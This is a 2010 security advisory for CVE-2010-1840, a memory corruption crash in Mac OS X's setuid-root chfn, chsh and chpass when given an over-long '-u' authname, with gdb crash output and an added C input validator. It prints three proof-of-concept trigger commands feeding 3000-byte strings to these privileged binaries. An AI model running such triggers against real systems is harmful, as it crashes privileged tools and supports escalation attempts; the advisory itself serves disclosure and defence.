Apple Directory Services Memory Corruption
Posted Nov 11, 2010
Authored by Rodrigo Rubira Branco

Apple Directory Services suffers from a memory corruption vulnerability.

tags | advisory
systems | apple
advisories | CVE-2010-1840
SHA-256 | 8481c28235d20fa0485ba7450f678bb97a628f8d197b96a6443f807b2cf74e70

Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Apple Directory Services Memory Corruption
CVE-2010-1840


INTRODUCTION

chfn, chpass and chsh do not properly parse the authname switch ("-u"), which causes the applications to crash when parsing a long string. These binaries are setuid root by default.

This problem was confirmed in the following versions of the Apple binaries and Mac OS X; other versions may also be affected:

Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh
Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh


CVSS Scoring System

The CVSS score is: 3.3
Base Score: 4.2
Temporal Score: 3.3
We used the following values to calculate the scores:
Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C
Temporal score is: E:POC/RL:OF/RC:C


TRIGGERING THE PROBLEM

/usr/bin/chfn -u `perl -e 'print "A" x 3000'`
/usr/bin/chsh -u `perl -e 'print "A" x 3000'`
/usr/bin/chpass -u `perl -e 'print "A" x 3000'`


DETAILS

Disassembly:

0x92237215 <CFArrayGetValueAtIndex+101>: mov $0x28,%al
0x92237217 <CFArrayGetValueAtIndex+103>: cmp $0xc,%ecx
0x9223721a <CFArrayGetValueAtIndex+106>: mov $0x14,%dl
0x9223721c <CFArrayGetValueAtIndex+108>: cmovne %edx,%eax
0x9223721f <CFArrayGetValueAtIndex+111>: add %esi,%eax
0x92237221 <CFArrayGetValueAtIndex+113>: mov 0xc(%ebp),%edx
0x92237224 <CFArrayGetValueAtIndex+116>: lea (%eax,%edx,4),%eax
0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax <----- Crash here.

(gdb) x/i $pc
0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax
(gdb) i r $eax
eax 0x585d910 92657936
(gdb) bt
#0 0x92237227 in CFArrayGetValueAtIndex ()
#1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()
#2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()
#3 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()
#5 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#6 0x9225b50c in CFBundleCopyResourceURL ()
#7 0x9225bb32 in CFBundleCopyLocalizedString ()
#8 0x903633eb in _ODNodeSetCredentials ()
#9 0x90369813 in ODRecordSetNodeCredentials ()
#10 0x000044be in ?? ()
#11 0x000026ac in ?? ()
#12 0x000022ee in ?? ()


The Mac OS X heap protection mechanisms mitigate the impact of this vulnerability.
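Heap protection limits what a corrupted allocation can do after the fact; the cheaper control is to reject an over-long or malformed authname before it ever reaches the directory-services calls in the backtrace. The validator below is an added example written for this page, not code from Apple or from the advisory; it bounds the "-u" argument to the host's login-name limit (via sysconf(_SC_LOGIN_NAME_MAX), falling back to 32 if unreported) and to the POSIX portable user-name charset, and it rejects the "A" x 3000 string used in the trigger commands.

```c
/* Added example, not part of the advisory: validate a "-u" authname
 * before handing it to directory-services code. The 3000-byte string
 * from the trigger commands is rejected up front; ordinary names pass. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Longest login name this host accepts, not counting the NUL.
 * Falls back to 32 (an assumed value) if sysconf() gives no answer. */
static size_t authname_limit(void)
{
    long lim = sysconf(_SC_LOGIN_NAME_MAX);
    return (lim > 1) ? (size_t)lim - 1 : 32;
}

/* POSIX portable user-name charset: [A-Za-z0-9._-]. */
static int authname_char_ok(unsigned char c)
{
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
           (c >= '0' && c <= '9') || c == '.' || c == '_' || c == '-';
}

/* Returns 1 if name may be passed on as an authname, 0 otherwise.
 * A leading '-' is refused so the value cannot be mistaken for a switch. */
int authname_is_valid(const char *name)
{
    size_t max = authname_limit();
    if (name == NULL || name[0] == '\0' || name[0] == '-')
        return 0;
    /* Bounded scan: never read more than max+1 bytes of untrusted input. */
    size_t len = strnlen(name, max + 1);
    if (len > max)
        return 0;                       /* the "A" x 3000 case ends here */
    for (size_t i = 0; i < len; i++)
        if (!authname_char_ok((unsigned char)name[i]))
            return 0;
    return 1;
}

/* Helper mirroring perl's "A" x N: validate a name of n copies of c. */
int authname_check_repeated(char c, size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return 0;
    memset(buf, c, n);
    buf[n] = '\0';
    int ok = authname_is_valid(buf);
    free(buf);
    return ok;
}
```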


CREDITS

This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).

ACKNOWLEDGEMENTS

Many thanks to Rafael Silva, who brought the issue in the chfn binary to our attention.




--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense